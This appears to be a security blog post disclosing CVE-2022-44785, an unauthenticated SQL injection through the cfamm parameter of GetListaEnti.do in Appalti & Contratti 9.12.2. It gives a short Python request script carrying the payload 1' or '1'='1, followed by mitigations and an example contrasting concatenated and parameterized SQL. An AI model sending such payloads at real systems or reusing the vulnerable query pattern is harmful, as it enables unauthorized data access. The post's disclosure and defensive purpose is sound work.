Security researchers recently discovered an issue in the Appalti & Contratti 9.12.2 web application suite that enables attackers to exploit multiple SQL Injection vulnerabilities, including some that can be executed by unauthenticated users. The vulnerable parameter identified is cfamm in the GetListaEnti.do HTTP request.

In this post, we'll discuss the discovery and the implications of these vulnerabilities, provide code snippets and references, and suggest mitigations to help developers and administrators protect their systems from potential attacks.

Background Information

Appalti & Contratti is a widely used web application for managing contracts and procurement in various organizations. It's crucial to ensure that the software is free from security vulnerabilities to maintain the integrity and confidentiality of sensitive data.

Exploit Details

The issue stems from the lack of proper filtering and validation when handling user-supplied input in some HTTP requests, leading to SQL Injection vulnerabilities. The affected parameter cfamm, found in the GetListaEnti.do HTTP request, is especially concerning as it can be exploited by unauthenticated users.

Below is a code snippet demonstrating how an attacker could exploit CVE-2022-44785:

import requests

# Endpoint that carries the vulnerable cfamm parameter.
url = "http://target/GetListaEnti.do"
data = {
    "cfamm": "1' or '1'='1",  # Injection payload that evaluates to 'true'.
    "maxResults": 25,
}

# The request is sent unauthenticated, which is what makes this finding notable.
response = requests.post(url, data=data)
if response.status_code == 200:
    print("SQL Injection vulnerability detected!")
else:
    print("The target seems secure.")

In this example, the malicious payload (1' or '1'='1) is designed to manipulate the SQL query so that its WHERE clause always evaluates to 'true', allowing unauthorized access to sensitive data. To learn more about SQL Injection attacks, check out this OWASP guide.

Mitigations

To address these vulnerabilities, developers and administrators should apply the following mitigations:

1. Update the Appalti & Contratti software to the latest version, which contains patches for most known vulnerabilities.
2. Employ proper input filtering and validation techniques to ensure that user-supplied data is in the expected format, reducing the chances of malicious code injection. For guidance, refer to the OWASP Input Validation Cheat Sheet.
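To show why the second mitigation matters and what the fix looks like at the query level, here is an added example that is not code from Appalti & Contratti: a vulnerable lookup that splices cfamm into the SQL text, next to a hardened version that binds it as a parameter, both run against a constructed in-memory SQLite table (the table and column names, and the 11-digit cfamm format used by the validator, are assumptions).

```python
import re
import sqlite3

# Constructed in-memory data standing in for the application's database.
# Table/column names are assumptions, not taken from Appalti & Contratti.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE enti (id INTEGER PRIMARY KEY, cfamm TEXT, nome TEXT);
        INSERT INTO enti (cfamm, nome) VALUES
            ('80001234567', 'Ente A'),
            ('80007654321', 'Ente B'),
            ('80009999999', 'Ente C');
    """)
    return conn

def lista_enti_vulnerable(conn, cfamm):
    # The user-controlled value becomes part of the statement text, so a quote
    # in the input rewrites the WHERE clause (the flaw class described above).
    query = "SELECT nome FROM enti WHERE cfamm = '" + cfamm + "' ORDER BY id"
    return [row[0] for row in conn.execute(query)]

def lista_enti_fixed(conn, cfamm):
    # Parameter binding keeps the value out of the SQL grammar entirely: the
    # same payload is compared literally against the column and matches nothing.
    query = "SELECT nome FROM enti WHERE cfamm = ? ORDER BY id"
    return [row[0] for row in conn.execute(query, (cfamm,))]

# Defence in depth (mitigation 2): reject anything that is not in the expected
# shape before it reaches the database. The 11-digit format is an assumption.
CFAMM_RE = re.compile(r"^[0-9]{11}$")

def cfamm_is_valid(cfamm):
    return bool(CFAMM_RE.match(cfamm))

PAYLOAD = "1' or '1'='1"  # the payload quoted in the post

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", lista_enti_vulnerable(conn, PAYLOAD))  # all three rows
    print("fixed:     ", lista_enti_fixed(conn, PAYLOAD))       # no rows
    print("valid?    ", cfamm_is_valid(PAYLOAD))               # False
```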

For further information about CVE-2022-44785, consult the following resources:

1. CVE-2022-44785 official entry in the National Vulnerability Database (NVD).
2. Appalti & Contratti official website detailing the product's features and latest updates.

Conclusion

The discovery of the SQL Injection vulnerabilities in Appalti & Contratti 9.12.2, especially one that can be exploited by unauthenticated users, highlights the importance of keeping web applications up to date and employing secure coding practices. By being proactive and implementing the recommended mitigations, developers and administrators can significantly reduce the risk associated with these vulnerabilities.

Stay informed about the latest security vulnerabilities and best practices to ensure the safety of your web applications, and be sure to share this information with your peers to maintain a strong security posture.

Timeline

Published on: 11/21/2022 23:15:00 UTC
Last modified on: 11/23/2022 16:01:00 UTC